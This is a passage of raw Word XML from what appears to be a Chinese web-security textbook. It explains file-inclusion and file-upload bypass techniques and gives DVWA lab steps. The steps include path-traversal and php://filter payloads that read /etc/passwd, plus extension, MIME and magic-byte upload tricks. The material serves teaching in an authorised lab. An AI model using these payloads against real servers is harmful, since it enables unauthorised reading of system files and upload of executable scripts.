          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">还是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RFI，其根源仍是数据与代码边界的混淆，与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）同属注入类缺陷，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的宏观分类中均归属于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03: Injection。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="208"/>
    <w:bookmarkStart w:id="209" w:name="文件上传绕过伪装与绕过检测"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件上传绕过：伪装与绕过检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件上传功能若只依赖客户端校验（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检查扩展名），或者服务端用脆弱的黑名单过滤，极易被绕过。攻击者通过以下思路让服务器接收并保存可执行的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">扩展名绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：黑名单只拦截</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而放过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.phtml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.pHp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（大小写）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（多重扩展名）等；或利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器解析漏洞（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php.xxx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MIME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">类型伪造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：拦截</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/x-php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">image/jpeg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，如果服务端仅检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MIME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头则被绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内容校验绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> webshell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本头部添加合法的图片/文件魔术字节（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GIF89a），再嵌入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码；服务端若只读取文件头几个字节判断类型，便可能漏过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目录权限与执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：即使上传到静态资源目录，若该目录允许脚本执行，webshell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">依旧可以运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以上就是上传绕过的典型思路，在授权靶机中展示时仅构造无害的教学示例（如仅输出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），不提供可用于实战的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> webshell。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="209"/>
    <w:bookmarkEnd w:id="210"/>
    <w:bookmarkStart w:id="214" w:name="靶机实操单元-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="211" w:name="实验环境"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机：DVWA（Damn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vulnerable Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Application），安装方法见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">难度等级：Low（路径遍历与文件包含）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Low/Medium（文件上传）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具：浏览器，可选</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Suite（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）拦截修改请求。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="211"/>
    <w:bookmarkStart w:id="212" w:name="文件包含实验"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件包含实验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> File Inclusion </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">功能读取敏感文件（如系统密码文件），并演示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在浏览器访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;TARGET_IP&gt;/dvwa/vulnerabilities/fi/?page=file1.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，观察到正常加载文件。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">page</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数替换为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..\..\..\..\windows\win.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境），请求变为：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;TARGET_IP&gt;/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若成功，页面会显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的内容（每行一个用户账户）。这是路径遍历与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结合的效果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：屏幕上显示出形如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的行，证明服务器脱离了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录限制。实际环境中的路径层级需自行尝试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面无内容或显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">failed to open stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：可能路径层级不够深或文件不存在，用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标记参数逐步尝试。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端自动添加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后缀：尝试使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">截断（在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP &lt; 5.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中有效），或使用封装器（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">php://filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）等方法，但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA Low </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">难度默认无后缀限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">低难度下的另一种玩法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">php://filter/convert.base64-encode/resource=../../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Base64 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">形式读出文件内容，防止浏览器解析破坏格式。这是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常用技巧。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="212"/>
    <w:bookmarkStart w:id="213" w:name="文件上传实验"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件上传实验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：绕过简单的文件类型检查，上传一个含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息的文件，验证上传绕过原理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤（Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">难度）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> File Upload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关卡，尝试直接上传一个只有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php phpinfo; ?&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">info.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
